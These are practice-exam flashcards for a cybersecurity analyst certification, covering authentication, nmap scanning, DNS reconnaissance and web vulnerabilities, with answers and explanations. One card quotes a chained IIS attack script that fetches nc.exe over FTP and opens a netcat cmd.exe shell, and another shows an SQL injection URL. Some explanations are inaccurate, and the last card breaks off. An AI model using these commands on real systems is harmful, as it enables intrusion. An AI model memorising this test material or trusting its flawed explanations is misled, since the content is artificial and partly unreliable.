practice exam 3 Flashcards
(125 cards)
1
Q
Which of the following is NOT a means of improving data validation and trust?
A. Encrypting data in transit
B. Using MD5 checksums for files
C. Decrypting data at rest
D. Implementing Tripwire
A
C. Decrypting data at rest
Explanation
OBJ-1.1: Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation, or trust since the data at rest could be modified when decrypted.
2
Q
Which of the following would trigger the penetration tester to stop and contact the system owners during an engagement?
A. Discovery of obsfucated PHI data being stored on the system
B. Discovery of an indicator of compromise on a production server
C. Discovery of missing Windows security patches on a production server
D. Discovery of default credentials on an appliance in a staging network
A
B. Discovery of an indicator of compromise on a production server
Explanation
OBJ-1.1: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance.
3
Q
Which of the following identity and access management controls relies upon using a certificate-based authentication mechanism?
A. HOTP
B. Smart card
C. TOTP
D. Proximity card
A
B. Smart card
Explanation
OBJ-1.1: Smart cards, PIV, and CAC devices are used as an identity and access management control. These devices contain a digital certificate embedded within the smart card (PIV/CAC) presented to the system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital certificate to be presented to the system.
4
Q
What type of scan will measure the size or distance of a person’s external features with a digital video camera?
A. Iris scan
B. Retinal scan
C. Facial recognition scan
D. Signature kinetics scan
A
C. Facial recognition scan
Explanation
OBJ-1.1: A face recognition system is a computer application capable of identifying or verifying a person from a digital image or a video frame from a video source. One way to do this is by comparing selected facial features from the image and a face database. By measuring the external facial features, such as the distance between your eyes and nose, you can uniquely identify the user. A retinal scan is a biometric technique that uses unique patterns on a person’s retina blood vessels. Iris recognition or iris scanning is the process of using visible and near-infrared light to take a high-contrast photograph of a person’s iris. A signature kinetics scan measures a user’s action when signing their name and compares it against a known-good example or baseline.
5
Q
Which of the following will an adversary so during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE)
A. Take advantage of a software, hardware, or human vulnerability
B. Select backdoor implant and appropriate command and control infrastructure for operation
C. Wait for a malicious email attachment to be opened
D. Wait for a user to click on a malicious link
E. A webshell is installed on a web server
F. A backdoor/implant is placed on a victim’s client
A
A. Take advantage of a software, hardware, or human vulnerability
C. Wait for a malicious email attachment to be opened
D. Wait for a user to click on a malicious link
Explanation
OBJ-1.1: During this phase, activities taken during the exploitation phase are conducted against the target’s system. Taking advantage of or exploiting an accessible vulnerability, waiting for a malicious email attached to be opened, or waiting for a user to click on a malicious link is all part of the exploitation phase. The installation of a web shell, backdoor, or implant is all performed during the installation phase. Selecting a backdoor implant and appropriate command and control infrastructure occurs during the weaponization phase.
6
Q
What should administrators perform to reduce a system’s attack surface and remove unnecessary software, services, and insecure configuration settings?
A. Harvesting
B. Windowing
C. Hardening
D. Stealthing
A
C. Hardening
Explanation
OBJ-1.1: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, removing unnecessary software, unnecessary usernames or logins, and disabling or removing unnecessary services. Windows is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.
7
Q
Which of the following pairs of authentication factors should you choose to meet the requirements associated with MFA?
A.Username and password
B. Username and pin
C. Thumbprint and password
D. Thumbprint and retina scan
A
C. Thumbprint and password
Explanation
OBJ-1.1: Multi-factor authentication (MFA) requires a user to provide at least two different forms of authentication: something you know (username, password, pin), something you have (token, key fob, smartphone), something you are (fingerprint, retina scan), something you do (the way you speak a phrase or sign your name), or somewhere you are (location factor based on IP address or geolocation).
8
Q
Which of the following provides accounting, authorization, and authentication via a centralized privileged database, as well as challenge/response and password encryption?
A. Multi-factor authentication
B. ISAKMP
C. TACACS+
D. Network access control
A
C. TACACS+
Explanation
OBJ-1.1: TACACS+ is a AAA (accounting, authorization, and authentication) protocol to provide AAA services for access to routers, network access points, and other networking devices.
9
Q
A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company’s security controls. Which DNS assessment technique would be classified as active?
A. A DNS forward or reverse lookup
B. A zone transfer
C. A whois query
D. Using maltego
A
B. A zone transfer
Explanation
OBJ-2.1: DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a DNS transaction type. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. DNS zone transfers are an active technique. Performing a whois query is a passive reconnaissance technique that performs a query of the databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. Performing a DNS forward and reverse lookup zones is an active technique that allows the resolution of names to IP addresses and IP addresses to names. This can be conducted as a passive technique. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively since it can acquire the information from whois lookup servers, a DNS lookup tool using public DNS servers, or even emails and hostnames one can acquire from TheHarvester.
10
Q
You are working as part of a penetration testing team conducting engagement against Dion Training’s network. You have been given a list of targets in a text file called servers.txt. Which of the following Nmap commands should you use to find all the servers from the list with ports 80 and 443 enabled and save the results in a greppable file called results.txt?
A. nmap -p80,443 -sL servers.txt -oX results.txt
B. nmap -p80,443 -iL servers.txt -oX results.txt
C. nmap -p80,443 -iL servers.txt -oG results.txt
D. nmap -p80,443 -sL servers.txt -oG results.txt
A
C. nmap -p80,443 -iL servers.txt -oG results.txt
Explanation
OBJ-2.2: The command (nmap -p80,443 -iL servers.txt -oG results.txt) will only perform an nmap scan against ports 80 and 443. The -iL option will scan each of the listed server’s IP addresses. The -oG option will save the results in a greppable format to the file results.txt while still displaying the normal results to the shell. The option of -sL will only list the servers to scan. It will not actually scan them. The option of -oX is for outputting the results to a file in an XML format.
11
Q
An attacker uses the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?
A. locate type=ns
B. request type=ns
C. set type=ns
D. transfer type=ns
A
C. set type=ns
Explanation
OBJ-2.1: The “set type=ns” tells nslookup only reports information on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.
12
Q
As a newly hired cybersecurity analyst, you are attempting to determine your organization’s current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company’s public-facing IP space?
A. shodan.io
B. nmap
C. Google hacking
D. Review network diagrams
A
A. shodan.io
Explanation
OBJ-2.1: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren’t, they cannot show the current “as is” configuration. If you can only select one tool to find your attack surface’s current and historical view, shodan is your best choice.
13
Q
You have just finished running an nmap scan on a server are see the following output:
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=- # nmap diontraining.com Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining.com (64.13.134.52)
Not shown: 996 filtered ports
PORT STATE
22/tcp open
23/tcp open
53/tcp open
443/tcp open
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
-=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=–=-=-=-=-=-=-
Based on the output above, which of the following ports listed as open represents the most significant security vulnerability to your network?
A. 22
B. 23
C. 53
D. 443
A
B. 23
Explanation
OBJ-2.2: Port 23 is used by telnet and is not considered secure because it sends all of its data in cleartext, including authentication data like usernames and passwords. As an analyst, you should recommend that telnet is disabled and blocked from use. The other open ports are for SSH (port 22), DNS (port 53), and HTTPS (port 443).
14
Q
You are working as a service desk analyst. This morning, you have received multiple calls from users reporting that they cannot access websites from their work computers. You decide to troubleshoot the issue by opening up your command prompt on your Windows machine and running a program to determine where the network connectivity outage occurs. Which tool should you use to determine if the issue is on the intranet portion of your corporate network or if it is occurring due to a problem with your ISP?
A. netstat
B. nslookup
C. ping
D. tracert
A
D. tracert
Explanation
OBJ-2.1: Tracert is a command-line utility used to trace an IP packet’s path as it moves from its source to its destination. While using ping will tell you if the remote website is reachable or not, it will not tell you where the connection is broken. Tracert performs a series of ICMP echo requests to determine which device in the connection path is not responding appropriately. This will help to identify if the connectivity issue lies within your intranet or is a problem with the ISP’s connection.
15
Q
You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization’s operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system?
A. Ask the CEO for a list of the critical systems
B. Conduct a nmap scan of the network to determine the OS of each system
C. Scope the scan based on IP subnets
D. Review the asset inventory and BCP
A
D. Review the asset inventory and BCP
Explanation
OBJ-2.1: To best understand a system’s criticality, you should review the asset inventory and the BCP. Most organizations classify each asset in its inventory based on its criticality to the organization’s operations. This helps to determine how many spare parts to have, the warranty requirements, service agreements, and other key factors to help keep these assets online and running at all times. Additionally, you can review the business continuity plan (BCP) since this will provide the organization’s plan for continuing business operations in the event of a disaster or other outage. Generally, the systems or operations listed in a BCP are the most critical ones to support business operations. While the CEO may be able to provide a list of the most critical systems in a large organization, it isn’t easy to get them to take the time to do it, even if they did know the answer. Worse, in most large organizations, the CEO isn’t going to know what systems he relies on, but instead just the business functions they serve, again making this a bad choice. While conducting a nmap scan may help you determine what OS is being run on each system, this information doesn’t help you determine criticality to operations. The same is true of using IP subnets since a list of subnets by itself doesn’t provide criticality or prioritization of the assets.
16
Q
What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A. A stealth scan that scans ports 80 and 443
B. A stealth scan that scans ports 80 to 443
C. A stealth scan that scans all open ports excluding ports 80 to 443
D. A stealth scan that scans all ports from 80 to 443 and determines a target’s operating system
A
D. A stealth scan that scans all ports from 80 to 443 and determines a target’s operating system
Explanation
OBJ-2.2: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.
17
Q
A security analyst conducts a nmap scan of a server and found that port 25 is open. What risk might this server be exposed to?
A. Open file/print sharing
B. Web portal data leak
C. Clear text authentication
D. Open mail relay
A
D. Open mail relay
Explanation
OBJ-2.2: Port 25 is the default port for SMTP (Simple Message Transfer Protocol), which is used for sending an email. An active mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).
18
Q
A penetration test tester conducts an ACK scan using nmap against the external interface of a DMZ firewall. Nmap reports port 80 as “unfiltered”. What type of packet inspection is the firewall performing?
A. Host inspection
B. Stateful inspection
C. Stateless inpsection
D. Application-level inspection
A
C. Stateless inpsection
Explanation
OBJ-2.2: The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Based on the unfiltered port state, the firewall must be performing stateless inspection. Stateless firewalls watch network traffic, and restrict or block packets based on source and destination addresses or other static values. They are not ‘aware’ of traffic patterns or data flows. A stateless firewall uses simple rule-sets with ACLs.
19
Q
What system contains a publicly available set of databases with registration contact information for every domain name on the Internet?
A. WHOIS
B. IANA
C. CAPTCHA
D. IETF
A
A. WHOIS
Explanation
OBJ-2.1: WHOIS is a query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. WHOIS also is used for a broader range of information. The protocol stores and delivers database content in a human-readable format and is publicly available for use. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers. A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The Internet Engineering Task Force (IETF) is an open standards organization that develops and promotes voluntary Internet standards, particularly the standards that comprise the Internet protocol suite.
20
Q
If you want to conduct an operating system identification during a nmap scan, which syntax should you utilize?
A. nmap -os
B. nmap -O
C. nmap -id
D. nmap -osscan
A
B. nmap -O
Explanation
OBJ-2.2: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.
21
Q
During scanning and enumeration, you have identified that a port 69 is open on a server. Which fo the following risks exist on this server?
A. Weak SSL cipher implementation
B. Cleartext log ins are accepted
C. Web portal informationn disclosure
D. Unauthenticated access to the server
A
D. Unauthenticated access to the server
Explanation
OBJ-2.3: Trivial File Transfer Protocol (TFTP) uses port 69. TFTP allows a client to get a file from or put a file onto a remote host. TFTP has no login or access control mechanisms, therefore if it is used it could allow unauthenticated access to the server.
22
Q
What techniques are commonly used by port and vulnerability scanners to identify the services running on a target system?
A. Comparing response fingerprints and registry scanning
B. Banner grabbing and UDP response timing
C. Using the -O option in nmap and UDP response timing
D. Banner grabbing and comparing response fingerprints
A
D. Banner grabbing and comparing response fingerprints
Explanation
OBJ-2.2: Service and version identification are often performed by conducting a banner grab or by checking responses for services to known fingerprints for those services. UDP response timing and other TCP/IP stack fingerprinting techniques are used to identify operating systems only. Using nmap -O will conduct an operating system fingerprint scan, but it will not identify the other services being run.
23
Q
Which of the following tools is used by a penetration tester to conduct open-source intelligence (OSINT)?
A. Nessus
B. Maltego
C. Empire
D. AirCrack-NG
A
B. Maltego
Explanation
OBJ-2.1: Maltego is an OSINT tool that is used to gather information from public resources. It has a graphical user interface (GUI) that visualizes the information gathered to help a penetration tester make logical connections between the different data sets collected.
24
Q
Which protocol relies on mutual authentication of the client and the server for its security?
A. RADIUS
B. Two-factor authentication
C. LDAPS
D. CHAP
A
C. LDAPS
Explanation
OBJ-2.3: The Lightweight Directory Access Protocol (LDAP) uses a client-server model for mutual authentication. LDAP is used to enable access to a directory of resources (workstations, users, information, etc.). TLS provides mutual authentication between clients and servers. Since Secure LDAP (LDAPS) uses TLS, it provides mutual authentication.
25
You have been asked to add an entry to your DNS records to allow SMTP traffic to be sent out using your domain name. Which type of record should you add to your DNS record?
A. CNAME
B. A
C. MX
D. AAAA
C. MX
Explanation
OBJ-2.1: An MX record is used for outgoing (SMTP) and incoming (POP3/IMAP) traffic. An A record associates your domain name with an IPv4 address. An AAAA record associates your domain name with an IPv6 address. A CNAME record is a canonical name or alias name, which associates one domain name as an alias of another (like beta.diontraining.com and www.diontraining.com could refer to the same website using a CNAME).
26
Which of the following ports is used by LDAP by default?
A. 53
B. 389
C. 427
D. 3389
B. 389
Explanation
OBJ-2.2: LDAP uses port 389 by default. LDAP (Lightweight Directory Access Protocol) Standard for accessing and updating information in an X.500-style network resource directory. Unless secure communications are used, LDAP is vulnerable to packet sniffing and Man-in-the-Middle attacks. It is also usually necessary to configure user permissions on the directory. LDAP version 3 supports simple authentication or Simple Authentication and Security Layer, which integrates it with Kerberos or TLS.
27
You have been asked to determine if Dion Training’s web server is vulnerable to a recently discovered attack on an older version of SSH. Which technique should you use to determine the current version of SSH running on their web server?
A. Vulnerability scan
B. Protocol analysis
C. Passive scan
D. Banner grabbing
D. Banner grabbing
Explanation
OBJ-2.2: Banner grabbing is conducted by actively connecting to the server using telnet or netcat and collecting the web server's response. This banner usually contains the server's operating system and the version number of the service (SSH) being run. This is the fastest and easiest way to determine the SSH version being run on this web server. While it is possible to use a vulnerability scanner, protocol analyzer, or to conduct a passive scan to determine the SSH version, these are more time consuming and not fully accurate methods to determine the version being run.
28
A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1
```
HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix) (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETgag: “1986-69b-123a4bc6”
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
```
What type of action did the analyst perform, based on the command and response above?
A. Cross-site scripting
B. Banner grabbing
C. SQL injection
D. Querying the Whois database
B. Banner grabbing
Explanation
OBJ-2.1: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server's operating system.
29
Which of the following commands can be used to resolve a DNS name to an IP address?
A. dns
B. query
C. host
D. iplookup
C. host
Explanation
OBJ-2.1: The host command is used for DNS (Domain Name System) lookup operations. It is used to find the IP address of a particular domain name or the domain name of a particular IP address. Nslookup and dig are also commands that can be used to lookup a domain name and convert it to an IP address within a Linux system.
30
A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over the results of their nmap scan results:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Starting NMAP 7.60 at 2020-06-12 21:23:15
NMAP scan report for 192.168.1.45
Host is up (0.78s latency).
Not shown: 992 closed ports
```
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
515/tcp open
631/tcp open ipp
9100/tcp open
MAC Address: 00:0C:29:18:6B:DB
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
```
Which of the following operating systems is most likely used by the host?
A. Windows server
B. Linux server
C. Windows workstation
D. Networked printer
D. Networked printer
Explanation
OBJ-2.2: Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP for most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, 445 are found, this is usually a good indication of a Windows file server. Port such as FTP, telnet, SMTP, and http is used by both Windows and Linux servers; therefore, they are not as helpful to indicate which operating system is in use by the host.
31
A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the corporate office of the bank's dumpster. Based on this description, what portion of the penetration test is being conducted?
A. Information reporting
B. Vulnerability assessment
C. Active information gathering
D. Passive information gathering
D. Passive information gathering
Explanation
OBJ-2.1: Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. Instead, active information gathering starts to probe the organization using DNS Enumeration, Port Scanning, and OS Fingerprinting techniques. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.
32
Which of the following ports are used to provide secure remote connection sessions over the Internet?
A. 22
B. 25
C. 80
D. 23
A. 22
Explanation
OBJ-2.2: Port 22 is used by Secure Shell (SSH) to securely create communication sessions over the Internet for remote access to a server or system. Telnet used to be used over port 23, but it is insecure and doesn't provide an encrypted tunnel like SSH does. Port 25 is for SMTP, and Port 80 is for HTTP, neither of which provide an encrypted tunnel, either.
33
A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?
A. Returns no useful results for an attacker
B. Returns all web pages containing the text diontraining.com
C. Returns all web pages containing an email address affiliated with diontraining.com
D. Returns all web pages hosted at diontraining.com
C. Returns all web pages containing an email address affiliated with diontraining.com
Explanation
OBJ-2.1: Google interprets this statement as <.anything>@diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear-phishing campaign. To return all web pages hosted at diontraining.com, you should use the "site:" modifier in the query. To return all web pages with the text diontraining.com, enter "diontraining.com" into the Google search bar with no modifiers to return those results.
34
Which of the following port or ports does SIP use?
A. 443
B. 389/636
C. 135/139/445
D. 5060/5061
D. 5060/5061
Explanation
OBJ-2.3: SIP works with other protocols over 5060/5061. 443 is HTTPS, 389/636 is LDAP, and 135/139/445 is NetBIOS and SMB.
35
A cybersecurity analyst at Yoyodyne Systems just finished reading a news article about their competitor, Whamiedyne Systems, being hacked by an unknown threat actor. Both companies sell to the same basic group of consumers over the internet since their products are used interchangeably by consumers. Which of the following is a valid cybersecurity concern for Yoyodyne Systems?
A. The attacker will conduct a man-in-the-middle attack
B. The same vulnerability will be compromised on their servers
C. The attacker will conduct a SQL injection against their database
D. They may now be vulnerable to a credential stuffing attack
D. They may now be vulnerable to a credential stuffing attack
Explanation
OBJ-5.1: The largest and most immediate cybersecurity concern that the analyst should have is credential stuffing. Credential stuffing occurs when an attacker tests username and password combinations against multiple online sites. Since both companies share a common consumption group, it is likely that some of Yoyodyne’s consumers also had a user account at Whamiedyne. If the attackers compromised the username and passwords from Whamiedyne’s servers, they might attempt to use those credentials on Yoyodyne’s servers, too. There is no definitive reason to believe that both companies are using the same infrastructure. Therefore, the same vulnerability that was exploited by the attacker may not exist at Yoyodyne. The question doesn’t mention an SQL database. Therefore, there is no direct threat of an SQL injection. A man-in-the-middle (MitM) attack occurs when the attacker sits between two communicating hosts and transparently captures, monitors, and relays all communications between the host. Nothing in this question indicates that a MitM was utilized or is a possible threat.
36
A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");
$o=; print "Opening FTP connection...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which exploit type is indicated by this script?
A. Buffer overflow exploit
B. Chained exploit
C. SQL injection exploit
D. Denial of Service exploit
B. Chained exploit
Explanation
OBJ-5.2: The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly where a program that occurs while writing data to a buffer overruns the buffer's boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions.
37
Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks?
A. Directory traversals
B. File inclusions
C. Faulty input validation
D. Output encoding
C. Faulty input validation
Explanation
OBJ-5.1: A primary vector for attacking applications is to exploit faulty input validation. The input could include user data entered into a form or URL, passed by another application or link. This is heavily exploited by cross-site scripting, SQL injection, and XML injection attacks. Directory traversal is the practice of accessing a file from a location that the user is unauthorized to access. The attacker does this by ordering an application to backtrack through the directory path to read or execute a file in a parent directory. In a file inclusion attack, the attacker adds a file to a web app or website's running process. The file is either constructed to be malicious or manipulated to serve the attacker's malicious purposes. Cross-site scripting (XSS) is one of the most powerful input validation exploits. XSS involves a trusted site, a client browsing the trusted site, and the attacker's site.
38
Which of the following vulnerabilities can be prevented by using proper input validation? (Select ANY that apply)
A. Cross-site scripting
B. SQL injection
C. Directory traversal
D. XML injection
A. Cross-site scripting
B. SQL injection
C. Directory traversal
D. XML injection
Explanation
OBJ-5.1: Proper input validation can prevent cross-site scripting, SQL injection, directory traversal, and XML injections from occurring. When an application accepts string input, the input should be subjected to normalization or sanitization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This can prevent SQL and XML injections from occurring. Input validation is also good at preventing cross-site scripting (XSS) in forms that accept user input. Directory traversals can be prevented by conducting input validation in file paths or URLs accepted from a user. This prevents a canonicalization attack from disguising the nature of the malicious input that could cause a directory traversal.
39
A penetration tester is conducting software assurance testing on a web application for Dion Training. You discover the web application is vulnerable to an SQL injection and could disclose a regular user's password. Which of the following actions should you perform?
A. Conduct a proof-of-concept exploit on three user accounts at random and document this in your report
B. Document the finding with an executive summary, methodology used, and a remediation recommendation
C. Contact the development team directly and recommend adding input validation to the web application
D. Recommend that the company conduct a full penetration test of their systems to identify other vulnerabilities
B. Document the finding with an executive summary, methodology used, and a remediation recommendation
Explanation
OBJ-5.3: When you find a vulnerability, it should be documented fully. This includes providing an executive summary for management, the methodology used to find the vulnerability so that others can recreate and verify it, and the recommendation remediation actions that should be taken. You should not exploit three random accounts on the server, which could negatively impact the client's reputation. You should not contact the development team directly since they may ignore your recommendation, and they did not hire you. While it may be a good idea to conduct a full-scale penetration test, that would not necessarily solve this vulnerability.
40
Which of the following is NOT a valid reason to conduct reverse engineering?
A. To commit industrial espionage
B. To determine how a piece of malware operates
C. To allow the software developer to spot flaws in their source code
D. To allow an attacker to spot vulnerabilities in an executable
C. To allow the software developer to spot flaws in their source code
Explanation
OBJ-5.1: If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system's or application's structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information about how the malware propagates and its primary directives. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor's application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.
41
Which of the following secure coding best practices ensures special characters like <, >, /, and ‘ are not accepted from the user via a web form?
A. Session management
B. Output encoding
C. Error handling
D. Input validation
D. Input validation
Explanation
OBJ-5.3: Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering a malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the user. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the < string when writing to an HTML page.
42
Your team is developing an update to a piece of code that allows customers to update their billing and shipping addresses in the web application. The shipping address field used in the database was designed with a limit of 75 characters. Your team's web programmer has brought you some algorithms that may help prevent an attacker from trying to conduct a buffer overflow attack by submitting invalid input to the shipping address field. Which pseudo-code represents the best solution to prevent this issue?
A. if (shippingAddress = 75) {update field} else exit
B. if (shippingAddress != 75) {update field} else exit
C. if (shippingAddress >= 75) {update field} else exit
D. if (shippingAddress <= 75) {update field} else exit
D. if (shippingAddress <= 75) {update field} else exit
Explanation
OBJ-5.2: To ensure that the field is not overrun by an input that is too long, input validation must occur. Checking if the shipping address is less than or equal to 75 characters before updating the field will prevent a buffer overflow from occurring in this program. If the input is 76 characters or more, then the field will not be updated, and the algorithm will exit the function.
43
You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention?
A. httpd_log
B. apache_log
C. access_log
D. http_log
C. access_log
Explanation
OBJ-5.1: On Apache web servers, the logs are stored in a file named access_log. By default, the file can be located at /var/log/httpd/access_log. This file records all requests processed by the Apache server. The WebSphere Application Server uses the httpd_log file for z/OS, which is a very outdated server from the early 2000s. The http_log file is actually a header class file in C used by the Apache web server's pre-compiled code that provides the logging library but does not contain any actual logs itself. The file called apache_log is actually an executable program that parses Apache log files within in Postgres database.
44
While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of exploit are you attempting?
A. Session hijacking
B. SQL injection
C. Buffer overflow
D. XML injection
B. SQL injection
Explanation
